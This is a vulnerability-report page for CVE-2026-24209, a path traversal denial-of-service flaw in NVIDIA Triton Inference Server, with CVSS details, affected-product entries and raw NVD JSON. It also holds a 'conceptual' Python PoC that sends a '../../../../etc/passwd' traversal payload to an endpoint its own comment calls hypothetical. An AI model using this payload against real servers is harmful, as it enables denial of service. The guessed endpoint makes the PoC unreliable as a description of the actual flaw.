Security Vulnerability Report
中文
CVE-2026-24209 CVSS 7.5 HIGH

CVE-2026-24209

Published: 2026-05-20 04:16:46
Last Modified: 2026-05-20 17:22:25

Description

NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a path traversal issue. A successful exploit of this vulnerability might lead to denial of service.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:triton_inference_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
NVIDIA Triton Inference Server (具体受影响版本请参考 NVIDIA 官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Conceptual Proof of Concept for CVE-2026-24209 # Target: NVIDIA Triton Inference Server # Description: Sends a payload with path traversal sequences to trigger DoS. target_host = "http://target-triton-server:8000" vulnerable_endpoint = "/v2/models/infer" # Hypothetical endpoint # Payload attempting to traverse directories payload = { "model_name": "../../../../../../etc/passwd" } try: print(f"Sending request to {target_host}{vulnerable_endpoint}...") response = requests.post(target_host + vulnerable_endpoint, json=payload, timeout=5) # Check if the service is still responding or if it crashed if response.status_code == 200: print("Request sent successfully. Check server logs for path access.") else: print(f"Received status code: {response.status_code}") except requests.exceptions.RequestException as e: # A connection error or timeout might indicate a successful DoS print(f"Connection failed or timeout: {e}") print("The server might have crashed (Denial of Service).")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24209", "sourceIdentifier": "[email protected]", "published": "2026-05-20T04:16:46.463", "lastModified": "2026-05-20T17:22:25.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a path traversal issue. A successful exploit of this vulnerability might lead to denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:triton_inference_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.03", "matchCriteriaId": "D5CC0AB5-9C28-4746-A0A0-D44CC1D43DF6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24209", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5828", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24209", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}